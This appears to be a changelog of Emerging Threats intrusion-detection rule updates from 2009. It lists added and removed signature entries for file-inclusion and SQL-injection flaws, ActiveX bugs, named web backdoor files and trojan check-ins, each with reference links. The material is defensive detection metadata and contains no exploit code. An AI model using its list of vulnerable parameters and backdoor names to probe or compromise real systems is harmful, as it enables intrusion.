        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009320 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_rgboard || url,doc.emergingthreats.net/2009321 || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_SupportSoft || url,doc.emergingthreats.net/2009322 || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009323 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Demium || url,doc.emergingthreats.net/2009324 || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009325 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009326 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_phPortal || url,doc.emergingthreats.net/2009327 || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Geovision || url,doc.emergingthreats.net/2009328 || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Zabbix || url,doc.emergingthreats.net/2009329 || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_MyForum || url,doc.emergingthreats.net/2009330 || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_tinyCMS || url,doc.emergingthreats.net/2009331 || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009332 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_ODARS || url,doc.emergingthreats.net/2009333 || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_Monrovia_Barcode || url,doc.emergingthreats.net/2009334 || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_NicLOR || url,doc.emergingthreats.net/2009335 || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009336 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009337 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009338 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009339 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009340 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009341 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009342 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009343 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_PHP_Shells || url,doc.emergingthreats.net/2009344 || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009345 || ET ATTACK-RESPONSE HTTP 401 Unauthorized || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009345
        2009346 || ET ATTACK-RESPONSE Frequent HTTP 401 Unauthorized - Possible Brute Force Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/ATTACK_RESPONSE/ATTACK_RESPONSE_401_Unauthorized || url,doc.emergingthreats.net/2009346
        2009347 || ET TROJAN Tigger.a/Syzor Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Tigger || url,doc.emergingthreats.net/2009347
        2009348 || ET CURRENT_EVENTS Inbound WorldPay Card Transaction Trojan || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Worldpay || url,doc.emergingthreats.net/2009348 || url,www.sophos.com/blogs/gc/g/2009/05/07/worldpay-card-transactions-carry-malware-danger/
        2009349 || ET TROJAN Metafisher/Bzub/Cimuz/Tanspy Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bzub || url,doc.emergingthreats.net/2009349
        2009350 || ET TROJAN Win32.Hupigon Control Server Response || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Hupington || url,doc.emergingthreats.net/2009350
        2009351 || ET TROJAN Urlzone/Bebloh Communication with Controller || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bebloh || url,doc.emergingthreats.net/2009351 || url,threatinfo.trendmicro.com/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_BEBLOH.KO&VSect=Td

     -> Added to emerging-virus.rules (2):
        #by shirkdog
        #disabling for now. this same payload seems to be used by a number of ping libraries

     -> Added to emerging.rules (1):
        #by Veerendra at secpod.com

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-drop-BLOCK.rules (2):
        #  VERSION 1534
        #  Generated 2009-05-09 00:03:03 EDT

     -> Removed from emerging-drop.rules (2):
        #  VERSION 1534
        #  Generated 2009-05-09 00:03:03 EDT

     -> Removed from emerging-exploit.rules (2):
        #This is a good auth back from the server
        #this is for a server saying auth failed

     -> Removed from emerging-sid-msg.map (177):
        2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
        2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792
        2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642
        2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
        2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
